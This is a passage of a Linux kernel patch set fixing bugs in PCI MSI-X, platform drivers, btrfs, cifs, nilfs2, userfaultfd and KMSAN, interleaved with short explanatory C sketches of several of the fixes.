+-static bool pci_msix_validate_entries(struct pci_dev *dev, struct msix_entry *entries,
+-				      int nvec, int hwsize)
++static bool pci_msix_validate_entries(struct pci_dev *dev, struct msix_entry *entries, int nvec)
+ {
+ 	bool nogap;
+ 	int i, j;
+@@ -762,10 +761,6 @@ static bool pci_msix_validate_entries(struct pci_dev *dev, struct msix_entry *en
+ 	nogap = pci_msi_domain_supports(dev, MSI_FLAG_MSIX_CONTIGUOUS, DENY_LEGACY);
+ 
+ 	for (i = 0; i < nvec; i++) {
+-		/* Entry within hardware limit? */
+-		if (entries[i].entry >= hwsize)
+-			return false;
+-
+ 		/* Check for duplicate entries */
+ 		for (j = i + 1; j < nvec; j++) {
+ 			if (entries[i].entry == entries[j].entry)
+@@ -805,7 +800,7 @@ int __pci_enable_msix_range(struct pci_dev *dev, struct msix_entry *entries, int
+ 	if (hwsize < 0)
+ 		return hwsize;
+ 
+-	if (!pci_msix_validate_entries(dev, entries, nvec, hwsize))
++	if (!pci_msix_validate_entries(dev, entries, nvec))
+ 		return -EINVAL;
+ 
+ 	if (hwsize < nvec) {
+diff --git a/drivers/perf/amlogic/meson_g12_ddr_pmu.c b/drivers/perf/amlogic/meson_g12_ddr_pmu.c
+index a78fdb15e26c2..8b643888d5036 100644
+--- a/drivers/perf/amlogic/meson_g12_ddr_pmu.c
++++ b/drivers/perf/amlogic/meson_g12_ddr_pmu.c
+@@ -21,23 +21,23 @@
+ #define DMC_QOS_IRQ		BIT(30)
+ 
+ /* DMC bandwidth monitor register address offset */
+-#define DMC_MON_G12_CTRL0		(0x20  << 2)
+-#define DMC_MON_G12_CTRL1		(0x21  << 2)
+-#define DMC_MON_G12_CTRL2		(0x22  << 2)
+-#define DMC_MON_G12_CTRL3		(0x23  << 2)
+-#define DMC_MON_G12_CTRL4		(0x24  << 2)
+-#define DMC_MON_G12_CTRL5		(0x25  << 2)
+-#define DMC_MON_G12_CTRL6		(0x26  << 2)
+-#define DMC_MON_G12_CTRL7		(0x27  << 2)
+-#define DMC_MON_G12_CTRL8		(0x28  << 2)
+-
+-#define DMC_MON_G12_ALL_REQ_CNT		(0x29  << 2)
+-#define DMC_MON_G12_ALL_GRANT_CNT	(0x2a  << 2)
+-#define DMC_MON_G12_ONE_GRANT_CNT	(0x2b  << 2)
+-#define DMC_MON_G12_SEC_GRANT_CNT	(0x2c  << 2)
+-#define DMC_MON_G12_THD_GRANT_CNT	(0x2d  << 2)
+-#define DMC_MON_G12_FOR_GRANT_CNT	(0x2e  << 2)
+-#define DMC_MON_G12_TIMER		(0x2f  << 2)
++#define DMC_MON_G12_CTRL0		(0x0  << 2)
++#define DMC_MON_G12_CTRL1		(0x1  << 2)
++#define DMC_MON_G12_CTRL2		(0x2  << 2)
++#define DMC_MON_G12_CTRL3		(0x3  << 2)
++#define DMC_MON_G12_CTRL4		(0x4  << 2)
++#define DMC_MON_G12_CTRL5		(0x5  << 2)
++#define DMC_MON_G12_CTRL6		(0x6  << 2)
++#define DMC_MON_G12_CTRL7		(0x7  << 2)
++#define DMC_MON_G12_CTRL8		(0x8  << 2)
++
++#define DMC_MON_G12_ALL_REQ_CNT		(0x9  << 2)
++#define DMC_MON_G12_ALL_GRANT_CNT	(0xa  << 2)
++#define DMC_MON_G12_ONE_GRANT_CNT	(0xb  << 2)
++#define DMC_MON_G12_SEC_GRANT_CNT	(0xc  << 2)
++#define DMC_MON_G12_THD_GRANT_CNT	(0xd  << 2)
++#define DMC_MON_G12_FOR_GRANT_CNT	(0xe  << 2)
++#define DMC_MON_G12_TIMER		(0xf  << 2)
+ 
+ /* Each bit represent a axi line */
+ PMU_FORMAT_ATTR(event, "config:0-7");
+diff --git a/drivers/platform/x86/asus-nb-wmi.c b/drivers/platform/x86/asus-nb-wmi.c
+index cb15acdf14a30..e2c9a68d12df9 100644
+--- a/drivers/platform/x86/asus-nb-wmi.c
++++ b/drivers/platform/x86/asus-nb-wmi.c
+@@ -464,7 +464,8 @@ static const struct dmi_system_id asus_quirks[] = {
+ 		.ident = "ASUS ROG FLOW X13",
+ 		.matches = {
+ 			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "GV301Q"),
++			/* Match GV301** */
++			DMI_MATCH(DMI_PRODUCT_NAME, "GV301"),
+ 		},
+ 		.driver_data = &quirk_asus_tablet_mode,
+ 	},
+diff --git a/drivers/platform/x86/gigabyte-wmi.c b/drivers/platform/x86/gigabyte-wmi.c
+index 322cfaeda17ba..2a426040f749e 100644
+--- a/drivers/platform/x86/gigabyte-wmi.c
++++ b/drivers/platform/x86/gigabyte-wmi.c
+@@ -140,6 +140,7 @@ static u8 gigabyte_wmi_detect_sensor_usability(struct wmi_device *wdev)
+ 	}}
+ 
+ static const struct dmi_system_id gigabyte_wmi_known_working_platforms[] = {
++	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("A320M-S2H V2-CF"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B450M DS3H-CF"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B450M DS3H WIFI-CF"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B450M S2H V2"),
+@@ -150,6 +151,7 @@ static const struct dmi_system_id gigabyte_wmi_known_working_platforms[] = {
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B550I AORUS PRO AX"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B550M AORUS PRO-P"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B550M DS3H"),
++	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B650 AORUS ELITE AX"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B660 GAMING X DDR4"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B660I AORUS PRO DDR4"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("Z390 I AORUS PRO WIFI-CF"),
+@@ -159,6 +161,7 @@ static const struct dmi_system_id gigabyte_wmi_known_working_platforms[] = {
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("X570 GAMING X"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("X570 I AORUS PRO WIFI"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("X570 UD"),
++	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("X570S AORUS ELITE"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("Z690M AORUS ELITE AX DDR4"),
+ 	{ }
+ };
+diff --git a/drivers/platform/x86/intel/vsec.c b/drivers/platform/x86/intel/vsec.c
+index 89c5374e33b32..bcbd522d062bf 100644
+--- a/drivers/platform/x86/intel/vsec.c
++++ b/drivers/platform/x86/intel/vsec.c
+@@ -141,6 +141,7 @@ static int intel_vsec_add_aux(struct pci_dev *pdev, struct intel_vsec_device *in
+ 
+ 	ret = ida_alloc(intel_vsec_dev->ida, GFP_KERNEL);
+ 	if (ret < 0) {
++		kfree(intel_vsec_dev->resource);
+ 		kfree(intel_vsec_dev);
+ 		return ret;
+ 	}
+diff --git a/drivers/pwm/core.c b/drivers/pwm/core.c
+index e01147f66e15a..474725714a05b 100644
+--- a/drivers/pwm/core.c
++++ b/drivers/pwm/core.c
+@@ -115,7 +115,14 @@ static int pwm_device_request(struct pwm_device *pwm, const char *label)
+ 	}
+ 
+ 	if (pwm->chip->ops->get_state) {
+-		struct pwm_state state;
++		/*
++		 * Zero-initialize state because most drivers are unaware of
++		 * .usage_power. The other members of state are supposed to be
++		 * set by lowlevel drivers. We still initialize the whole
++		 * structure for simplicity even though this might paper over
++		 * faulty implementations of .get_state().
++		 */
++		struct pwm_state state = { 0, };
+ 
+ 		err = pwm->chip->ops->get_state(pwm->chip, pwm, &state);
+ 		trace_pwm_get(pwm, &state, err);
+@@ -448,7 +455,7 @@ static void pwm_apply_state_debug(struct pwm_device *pwm,
+ {
+ 	struct pwm_state *last = &pwm->last;
+ 	struct pwm_chip *chip = pwm->chip;
+-	struct pwm_state s1, s2;
++	struct pwm_state s1 = { 0 }, s2 = { 0 };
+ 	int err;
+ 
+ 	if (!IS_ENABLED(CONFIG_PWM_DEBUG))
+@@ -530,6 +537,7 @@ static void pwm_apply_state_debug(struct pwm_device *pwm,
+ 		return;
+ 	}
+ 
++	*last = (struct pwm_state){ 0 };
+ 	err = chip->ops->get_state(chip, pwm, last);
+ 	trace_pwm_get(pwm, last, err);
+ 	if (err)
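
The pwm hunks above zero-initialize every pwm_state handed to a driver's .get_state() callback, because many drivers predate .usage_power and leave it untouched, turning later comparisons into reads of stack garbage. The idea in miniature; pwm_state_demo is a cut-down stand-in, not the real struct pwm_state:

	#include <stdio.h>

	struct pwm_state_demo {
		unsigned long period;
		unsigned long duty_cycle;
		int enabled;
		int usage_power;	/* newer field many drivers never write */
	};

	/* An older-style driver callback that only fills the original members. */
	static int get_state(struct pwm_state_demo *s)
	{
		s->period = 1000000;
		s->duty_cycle = 500000;
		s->enabled = 1;
		return 0;
	}

	int main(void)
	{
		/* Zero-init so untouched members are defined, not stack garbage. */
		struct pwm_state_demo s = { 0 };

		get_state(&s);
		printf("usage_power=%d\n", s.usage_power);	/* deterministically 0 */
		return 0;
	}
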
+diff --git a/drivers/regulator/fan53555.c b/drivers/regulator/fan53555.c
+index 529963a7e4f52..41537c45f0367 100644
+--- a/drivers/regulator/fan53555.c
++++ b/drivers/regulator/fan53555.c
+@@ -8,18 +8,19 @@
+ // Copyright (c) 2012 Marvell Technology Ltd.
+ // Yunfan Zhang <yfzhang@marvell.com>
+ 
++#include <linux/bits.h>
++#include <linux/err.h>
++#include <linux/i2c.h>
+ #include <linux/module.h>
++#include <linux/of_device.h>
+ #include <linux/param.h>
+-#include <linux/err.h>
+ #include <linux/platform_device.h>
++#include <linux/regmap.h>
+ #include <linux/regulator/driver.h>
++#include <linux/regulator/fan53555.h>
+ #include <linux/regulator/machine.h>
+ #include <linux/regulator/of_regulator.h>
+-#include <linux/of_device.h>
+-#include <linux/i2c.h>
+ #include <linux/slab.h>
+-#include <linux/regmap.h>
+-#include <linux/regulator/fan53555.h>
+ 
+ /* Voltage setting */
+ #define FAN53555_VSEL0		0x00
+@@ -60,7 +61,7 @@
+ #define TCS_VSEL1_MODE		(1 << 6)
+ 
+ #define TCS_SLEW_SHIFT		3
+-#define TCS_SLEW_MASK		(0x3 < 3)
++#define TCS_SLEW_MASK		GENMASK(4, 3)
+ 
+ enum fan53555_vendor {
+ 	FAN53526_VENDOR_FAIRCHILD = 0,
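
The fan53555 hunk above fixes a classic typo: (0x3 < 3) is a comparison that evaluates to 0, not the intended two-bit field mask, and GENMASK(4, 3) states the field bounds explicitly. A userspace rendering of the difference; GENMASK32 mirrors the shape of the kernel macro for 32-bit values:

	#include <stdio.h>

	#define GENMASK32(h, l) \
		(((~0u) - (1u << (l)) + 1) & (~0u >> (31 - (h))))

	int main(void)
	{
		printf("0x%x\n", 0x3 < 3);         /* 0x0: a comparison, not a shift */
		printf("0x%x\n", 0x3 << 3);        /* 0x18: the intended mask */
		printf("0x%x\n", GENMASK32(4, 3)); /* 0x18: same, self-documenting */
		return 0;
	}
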
+diff --git a/drivers/scsi/megaraid/megaraid_sas_base.c b/drivers/scsi/megaraid/megaraid_sas_base.c
+index 3ceece9883383..c895189375e2b 100644
+--- a/drivers/scsi/megaraid/megaraid_sas_base.c
++++ b/drivers/scsi/megaraid/megaraid_sas_base.c
+@@ -3298,7 +3298,7 @@ fw_crash_buffer_show(struct device *cdev,
+ 
+ 	spin_lock_irqsave(&instance->crashdump_lock, flags);
+ 	buff_offset = instance->fw_crash_buffer_offset;
+-	if (!instance->crash_dump_buf &&
++	if (!instance->crash_dump_buf ||
+ 		!((instance->fw_crash_state == AVAILABLE) ||
+ 		(instance->fw_crash_state == COPYING))) {
+ 		dev_err(&instance->pdev->dev,
+diff --git a/drivers/scsi/scsi.c b/drivers/scsi/scsi.c
+index dff1d692e756a..b1f9c86ed211f 100644
+--- a/drivers/scsi/scsi.c
++++ b/drivers/scsi/scsi.c
+@@ -314,11 +314,18 @@ static int scsi_vpd_inquiry(struct scsi_device *sdev, unsigned char *buffer,
+ 	if (result)
+ 		return -EIO;
+ 
+-	/* Sanity check that we got the page back that we asked for */
++	/*
++	 * Sanity check that we got the page back that we asked for and that
++	 * the page size is not 0.
++	 */
+ 	if (buffer[1] != page)
+ 		return -EIO;
+ 
+-	return get_unaligned_be16(&buffer[2]) + 4;
++	result = get_unaligned_be16(&buffer[2]);
++	if (!result)
++		return -EIO;
++
++	return result + 4;
+ }
+ 
+ static int scsi_get_vpd_size(struct scsi_device *sdev, u8 page)
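
The scsi_vpd_inquiry() hunk above additionally rejects a zero VPD page length, so a misbehaving device can no longer make callers treat a bare 4-byte header as a valid page. Roughly, in a standalone form; be16() stands in for get_unaligned_be16(), and the buffer layout follows the hunk, with the page code at byte 1 and a big-endian length at bytes 2-3:

	#include <errno.h>
	#include <stdio.h>

	static unsigned int be16(const unsigned char *p)
	{
		return (p[0] << 8) | p[1];
	}

	/* Reject a zero payload length so callers never loop on an empty page. */
	static int vpd_size(const unsigned char *buf, unsigned char page)
	{
		unsigned int len;

		if (buf[1] != page)
			return -EIO;
		len = be16(&buf[2]);
		if (!len)
			return -EIO;
		return len + 4;	/* payload plus the 4-byte header */
	}

	int main(void)
	{
		unsigned char good[4] = { 0x00, 0x80, 0x00, 0x08 };
		unsigned char bad[4]  = { 0x00, 0x80, 0x00, 0x00 };

		printf("%d\n", vpd_size(good, 0x80)); /* 12 */
		printf("%d\n", vpd_size(bad, 0x80));  /* -5 (-EIO) */
		return 0;
	}
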
+diff --git a/drivers/spi/spi-rockchip-sfc.c b/drivers/spi/spi-rockchip-sfc.c
+index bd87d3c92dd33..69347b6bf60cd 100644
+--- a/drivers/spi/spi-rockchip-sfc.c
++++ b/drivers/spi/spi-rockchip-sfc.c
+@@ -632,7 +632,7 @@ static int rockchip_sfc_probe(struct platform_device *pdev)
+ 	if (ret) {
+ 		dev_err(dev, "Failed to request irq\n");
+ 
+-		return ret;
++		goto err_irq;
+ 	}
+ 
+ 	ret = rockchip_sfc_init(sfc);
+diff --git a/fs/btrfs/discard.c b/fs/btrfs/discard.c
+index 317aeff6c1dac..a6d77fe41e1a9 100644
+--- a/fs/btrfs/discard.c
++++ b/fs/btrfs/discard.c
+@@ -56,11 +56,9 @@
+ #define BTRFS_DISCARD_DELAY		(120ULL * NSEC_PER_SEC)
+ #define BTRFS_DISCARD_UNUSED_DELAY	(10ULL * NSEC_PER_SEC)
+ 
+-/* Target completion latency of discarding all discardable extents */
+-#define BTRFS_DISCARD_TARGET_MSEC	(6 * 60 * 60UL * MSEC_PER_SEC)
+ #define BTRFS_DISCARD_MIN_DELAY_MSEC	(1UL)
+ #define BTRFS_DISCARD_MAX_DELAY_MSEC	(1000UL)
+-#define BTRFS_DISCARD_MAX_IOPS		(10U)
++#define BTRFS_DISCARD_MAX_IOPS		(1000U)
+ 
+ /* Monotonically decreasing minimum length filters after index 0 */
+ static int discard_minlen[BTRFS_NR_DISCARD_LISTS] = {
+@@ -577,6 +575,7 @@ void btrfs_discard_calc_delay(struct btrfs_discard_ctl *discard_ctl)
+ 	s32 discardable_extents;
+ 	s64 discardable_bytes;
+ 	u32 iops_limit;
++	unsigned long min_delay = BTRFS_DISCARD_MIN_DELAY_MSEC;
+ 	unsigned long delay;
+ 
+ 	discardable_extents = atomic_read(&discard_ctl->discardable_extents);
+@@ -607,13 +606,19 @@ void btrfs_discard_calc_delay(struct btrfs_discard_ctl *discard_ctl)
+ 	}
+ 
+ 	iops_limit = READ_ONCE(discard_ctl->iops_limit);
+-	if (iops_limit)
++
++	if (iops_limit) {
+ 		delay = MSEC_PER_SEC / iops_limit;
+-	else
+-		delay = BTRFS_DISCARD_TARGET_MSEC / discardable_extents;
++	} else {
++		/*
++		 * Unset iops_limit means go as fast as possible, so allow a
++		 * delay of 0.
++		 */
++		delay = 0;
++		min_delay = 0;
++	}
+ 
+-	delay = clamp(delay, BTRFS_DISCARD_MIN_DELAY_MSEC,
+-		      BTRFS_DISCARD_MAX_DELAY_MSEC);
++	delay = clamp(delay, min_delay, BTRFS_DISCARD_MAX_DELAY_MSEC);
+ 	discard_ctl->delay_ms = delay;
+ 
+ 	spin_unlock(&discard_ctl->lock);
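
The btrfs discard hunks above raise the IOPS cap and let an unset iops_limit mean fully unthrottled by permitting a zero delay, instead of deriving the delay from a six-hour completion target. The clamp logic, reduced to a standalone sketch with the same 1..1000 ms bounds:

	#include <stdio.h>

	#define MAX_DELAY_MS 1000UL

	static unsigned long calc_delay(unsigned int iops_limit)
	{
		unsigned long min_delay = 1, delay;

		if (iops_limit) {
			delay = 1000UL / iops_limit;
		} else {
			/* No limit: run back to back, so allow a zero delay. */
			delay = 0;
			min_delay = 0;
		}
		if (delay < min_delay)
			delay = min_delay;
		if (delay > MAX_DELAY_MS)
			delay = MAX_DELAY_MS;
		return delay;
	}

	int main(void)
	{
		printf("%lu\n", calc_delay(1000)); /* 1 ms between discards */
		printf("%lu\n", calc_delay(0));    /* 0: unthrottled */
		return 0;
	}
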
+diff --git a/fs/cifs/cifs_dfs_ref.c b/fs/cifs/cifs_dfs_ref.c
+index cb40074feb3e9..0329a907bdfe8 100644
+--- a/fs/cifs/cifs_dfs_ref.c
++++ b/fs/cifs/cifs_dfs_ref.c
+@@ -171,8 +171,6 @@ static struct vfsmount *cifs_dfs_do_automount(struct path *path)
+ 		mnt = ERR_CAST(full_path);
+ 		goto out;
+ 	}
+-
+-	convert_delimiter(full_path, '/');
+ 	cifs_dbg(FYI, "%s: full_path: %s\n", __func__, full_path);
+ 
+ 	tmp = *cur_ctx;
+diff --git a/fs/cifs/dfs.h b/fs/cifs/dfs.h
+index 13f26e01f7b97..0b8cbf721fff6 100644
+--- a/fs/cifs/dfs.h
++++ b/fs/cifs/dfs.h
+@@ -34,19 +34,33 @@ static inline int dfs_get_referral(struct cifs_mount_ctx *mnt_ctx, const char *p
+ 			      cifs_remap(cifs_sb), path, ref, tl);
+ }
+ 
++/* Return DFS full path out of a dentry set for automount */
+ static inline char *dfs_get_automount_devname(struct dentry *dentry, void *page)
+ {
+ 	struct cifs_sb_info *cifs_sb = CIFS_SB(dentry->d_sb);
+ 	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+ 	struct TCP_Server_Info *server = tcon->ses->server;
++	size_t len;
++	char *s;
+ 
+ 	if (unlikely(!server->origin_fullpath))
+ 		return ERR_PTR(-EREMOTE);
+ 
+-	return __build_path_from_dentry_optional_prefix(dentry, page,
+-							server->origin_fullpath,
+-							strlen(server->origin_fullpath),
+-							true);
++	s = dentry_path_raw(dentry, page, PATH_MAX);
++	if (IS_ERR(s))
++		return s;
++	/* for root, we want "" */
++	if (!s[1])
++		s++;
++
++	len = strlen(server->origin_fullpath);
++	if (s < (char *)page + len)
++		return ERR_PTR(-ENAMETOOLONG);
++
++	s -= len;
++	memcpy(s, server->origin_fullpath, len);
++	convert_delimiter(s, '/');
++	return s;
+ }
+ 
+ static inline void dfs_put_root_smb_sessions(struct list_head *head)
+diff --git a/fs/fs-writeback.c b/fs/fs-writeback.c
+index 6fba5a52127b2..713e2d97935ff 100644
+--- a/fs/fs-writeback.c
++++ b/fs/fs-writeback.c
+@@ -976,6 +976,16 @@ restart:
+ 			continue;
+ 		}
+ 
++		/*
++		 * If wb_tryget fails, the wb has been shutdown, skip it.
++		 *
++		 * Pin @wb so that it stays on @bdi->wb_list.  This allows
++		 * continuing iteration from @wb after dropping and
++		 * regrabbing rcu read lock.
++		 */
++		if (!wb_tryget(wb))
++			continue;
++
+ 		/* alloc failed, execute synchronously using on-stack fallback */
+ 		work = &fallback_work;
+ 		*work = *base_work;
+@@ -984,13 +994,6 @@ restart:
+ 		work->done = &fallback_work_done;
+ 
+ 		wb_queue_work(wb, work);
+-
+-		/*
+-		 * Pin @wb so that it stays on @bdi->wb_list.  This allows
+-		 * continuing iteration from @wb after dropping and
+-		 * regrabbing rcu read lock.
+-		 */
+-		wb_get(wb);
+ 		last_wb = wb;
+ 
+ 		rcu_read_unlock();
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 7aea13c33ddf3..5b15746055927 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -430,6 +430,23 @@ static int nilfs_segctor_reset_segment_buffer(struct nilfs_sc_info *sci)
+ 	return 0;
+ }
+ 
++/**
++ * nilfs_segctor_zeropad_segsum - zero pad the rest of the segment summary area
++ * @sci: segment constructor object
++ *
++ * nilfs_segctor_zeropad_segsum() zero-fills unallocated space at the end of
++ * the current segment summary block.
++ */
++static void nilfs_segctor_zeropad_segsum(struct nilfs_sc_info *sci)
++{
++	struct nilfs_segsum_pointer *ssp;
++
++	ssp = sci->sc_blk_cnt > 0 ? &sci->sc_binfo_ptr : &sci->sc_finfo_ptr;
++	if (ssp->offset < ssp->bh->b_size)
++		memset(ssp->bh->b_data + ssp->offset, 0,
++		       ssp->bh->b_size - ssp->offset);
++}
++
+ static int nilfs_segctor_feed_segment(struct nilfs_sc_info *sci)
+ {
+ 	sci->sc_nblk_this_inc += sci->sc_curseg->sb_sum.nblocks;
+@@ -438,6 +455,7 @@ static int nilfs_segctor_feed_segment(struct nilfs_sc_info *sci)
+ 				* The current segment is filled up
+ 				* (internal code)
+ 				*/
++	nilfs_segctor_zeropad_segsum(sci);
+ 	sci->sc_curseg = NILFS_NEXT_SEGBUF(sci->sc_curseg);
+ 	return nilfs_segctor_reset_segment_buffer(sci);
+ }
+@@ -542,6 +560,7 @@ static int nilfs_segctor_add_file_block(struct nilfs_sc_info *sci,
+ 		goto retry;
+ 	}
+ 	if (unlikely(required)) {
++		nilfs_segctor_zeropad_segsum(sci);
+ 		err = nilfs_segbuf_extend_segsum(segbuf);
+ 		if (unlikely(err))
+ 			goto failed;
+@@ -1531,6 +1550,7 @@ static int nilfs_segctor_collect(struct nilfs_sc_info *sci,
+ 		nadd = min_t(int, nadd << 1, SC_MAX_SEGDELTA);
+ 		sci->sc_stage = prev_stage;
+ 	}
++	nilfs_segctor_zeropad_segsum(sci);
+ 	nilfs_segctor_truncate_segments(sci, sci->sc_curseg, nilfs->ns_sufile);
+ 	return 0;
+ 
+diff --git a/fs/userfaultfd.c b/fs/userfaultfd.c
+index cc694846617a5..154c103eca751 100644
+--- a/fs/userfaultfd.c
++++ b/fs/userfaultfd.c
+@@ -1966,8 +1966,10 @@ static int userfaultfd_api(struct userfaultfd_ctx *ctx,
+ 	ret = -EFAULT;
+ 	if (copy_from_user(&uffdio_api, buf, sizeof(uffdio_api)))
+ 		goto out;
+-	/* Ignore unsupported features (userspace built against newer kernel) */
+-	features = uffdio_api.features & UFFD_API_FEATURES;
++	features = uffdio_api.features;
++	ret = -EINVAL;
++	if (uffdio_api.api != UFFD_API || (features & ~UFFD_API_FEATURES))
++		goto err_out;
+ 	ret = -EPERM;
+ 	if ((features & UFFD_FEATURE_EVENT_FORK) && !capable(CAP_SYS_PTRACE))
+ 		goto err_out;
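
The userfaultfd hunk above stops silently masking unknown feature bits and instead fails the handshake with -EINVAL, so userspace built against a newer kernel learns immediately that a feature is unsupported. A toy handshake with invented constants; API_VERSION and KNOWN_FEATURES are placeholders, not the real UFFD values:

	#include <errno.h>
	#include <stdio.h>

	#define API_VERSION    0xAAULL
	#define KNOWN_FEATURES 0x07ULL	/* illustrative bit set */

	/* Fail closed: unknown bits mean a newer userspace than this kernel. */
	static int api_handshake(unsigned long long api, unsigned long long features)
	{
		if (api != API_VERSION || (features & ~KNOWN_FEATURES))
			return -EINVAL;
		return 0;
	}

	int main(void)
	{
		printf("%d\n", api_handshake(API_VERSION, 0x3));  /* 0 */
		printf("%d\n", api_handshake(API_VERSION, 0x18)); /* -22 (-EINVAL) */
		return 0;
	}
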
+diff --git a/include/acpi/actypes.h b/include/acpi/actypes.h
+index 95e4f56f97546..1b4f81f1ac5db 100644
+--- a/include/acpi/actypes.h
++++ b/include/acpi/actypes.h
+@@ -723,8 +723,7 @@ typedef u32 acpi_event_type;
+ #define ACPI_EVENT_POWER_BUTTON         2
+ #define ACPI_EVENT_SLEEP_BUTTON         3
+ #define ACPI_EVENT_RTC                  4
+-#define ACPI_EVENT_PCIE_WAKE            5
+-#define ACPI_EVENT_MAX                  5
++#define ACPI_EVENT_MAX                  4
+ #define ACPI_NUM_FIXED_EVENTS           ACPI_EVENT_MAX + 1
+ 
+ /*
+diff --git a/include/linux/kmsan.h b/include/linux/kmsan.h
+index e38ae3c346184..30b17647ce3c7 100644
+--- a/include/linux/kmsan.h
++++ b/include/linux/kmsan.h
+@@ -134,11 +134,12 @@ void kmsan_kfree_large(const void *ptr);
+  * @page_shift:	page_shift passed to vmap_range_noflush().
+  *
+  * KMSAN maps shadow and origin pages of @pages into contiguous ranges in
+- * vmalloc metadata address range.
++ * vmalloc metadata address range. Returns 0 on success, callers must check
++ * for non-zero return value.
+  */
+-void kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
+-				    pgprot_t prot, struct page **pages,
+-				    unsigned int page_shift);
++int kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
++				   pgprot_t prot, struct page **pages,
++				   unsigned int page_shift);
+ 
+ /**
+  * kmsan_vunmap_kernel_range_noflush() - Notify KMSAN about a vunmap.
+@@ -159,11 +160,12 @@ void kmsan_vunmap_range_noflush(unsigned long start, unsigned long end);
+  * @page_shift:	page_shift argument passed to vmap_range_noflush().
+  *
+  * KMSAN creates new metadata pages for the physical pages mapped into the
+- * virtual memory.
++ * virtual memory. Returns 0 on success, callers must check for non-zero return
++ * value.
+  */
+-void kmsan_ioremap_page_range(unsigned long addr, unsigned long end,
+-			      phys_addr_t phys_addr, pgprot_t prot,
+-			      unsigned int page_shift);
++int kmsan_ioremap_page_range(unsigned long addr, unsigned long end,
++			     phys_addr_t phys_addr, pgprot_t prot,
++			     unsigned int page_shift);
+ 
+ /**
+  * kmsan_iounmap_page_range() - Notify KMSAN about a iounmap_page_range() call.
+@@ -281,12 +283,13 @@ static inline void kmsan_kfree_large(const void *ptr)
+ {
+ }
+ 
+-static inline void kmsan_vmap_pages_range_noflush(unsigned long start,
+-						  unsigned long end,
+-						  pgprot_t prot,
+-						  struct page **pages,
+-						  unsigned int page_shift)
++static inline int kmsan_vmap_pages_range_noflush(unsigned long start,
++						 unsigned long end,
++						 pgprot_t prot,
++						 struct page **pages,
++						 unsigned int page_shift)
+ {
++	return 0;
+ }
+ 
+ static inline void kmsan_vunmap_range_noflush(unsigned long start,
+@@ -294,12 +297,12 @@ static inline void kmsan_vunmap_range_noflush(unsigned long start,
+ {
+ }
+ 
+-static inline void kmsan_ioremap_page_range(unsigned long start,
+-					    unsigned long end,
+-					    phys_addr_t phys_addr,
+-					    pgprot_t prot,
+-					    unsigned int page_shift)
++static inline int kmsan_ioremap_page_range(unsigned long start,
++					   unsigned long end,
++					   phys_addr_t phys_addr, pgprot_t prot,
++					   unsigned int page_shift)
+ {
++	return 0;
+ }
+ 
+ static inline void kmsan_iounmap_page_range(unsigned long start,
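
The kmsan hunks above convert two mapping hooks from void to int so metadata allocation failures propagate to callers, with the compiled-out stubs returning 0 unconditionally. The shape of that API change in a self-contained sketch; HAVE_SHADOW and shadow_map_range() are invented names standing in for the KMSAN config option and hooks:

	#include <errno.h>
	#include <stdio.h>

	/* With the feature compiled out, the stub succeeds unconditionally,
	 * so callers can check the return value in both configurations. */
	#ifdef HAVE_SHADOW
	static int shadow_map_range(unsigned long start, unsigned long end)
	{
		if (end <= start)
			return -ENOMEM;	/* stand-in for a metadata alloc failure */
		return 0;
	}
	#else
	static inline int shadow_map_range(unsigned long start, unsigned long end)
	{
		return 0;
	}
	#endif

	int main(void)
	{
		int ret = shadow_map_range(0x1000, 0x2000);

		if (ret)
			fprintf(stderr, "mapping failed: %d\n", ret);
		else
			puts("mapped");
		return 0;
	}
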
+diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
+index 4c8492401a101..a1e7920f14ebc 100644
+--- a/include/linux/skbuff.h
++++ b/include/linux/skbuff.h
+@@ -291,6 +291,7 @@ struct nf_bridge_info {
+ 	u8			pkt_otherhost:1;
+ 	u8			in_prerouting:1;
+ 	u8			bridged_dnat:1;
++	u8			sabotage_in_done:1;
+ 	__u16			frag_max_size;
+ 	struct net_device	*physindev;
+ 
+@@ -4687,7 +4688,7 @@ static inline void nf_reset_ct(struct sk_buff *skb)
+ 
+ static inline void nf_reset_trace(struct sk_buff *skb)
+ {
+-#if IS_ENABLED(CONFIG_NETFILTER_XT_TARGET_TRACE) || defined(CONFIG_NF_TABLES)
++#if IS_ENABLED(CONFIG_NETFILTER_XT_TARGET_TRACE) || IS_ENABLED(CONFIG_NF_TABLES)
+ 	skb->nf_trace = 0;
+ #endif
+ }
+@@ -4707,7 +4708,7 @@ static inline void __nf_copy(struct sk_buff *dst, const struct sk_buff *src,
+ 	dst->_nfct = src->_nfct;
+ 	nf_conntrack_get(skb_nfct(src));
+ #endif
+-#if IS_ENABLED(CONFIG_NETFILTER_XT_TARGET_TRACE) || defined(CONFIG_NF_TABLES)
++#if IS_ENABLED(CONFIG_NETFILTER_XT_TARGET_TRACE) || IS_ENABLED(CONFIG_NF_TABLES)
+ 	if (copy)
+ 		dst->nf_trace = src->nf_trace;
+ #endif
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index 9430128aae991..1b8e305bb54ae 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
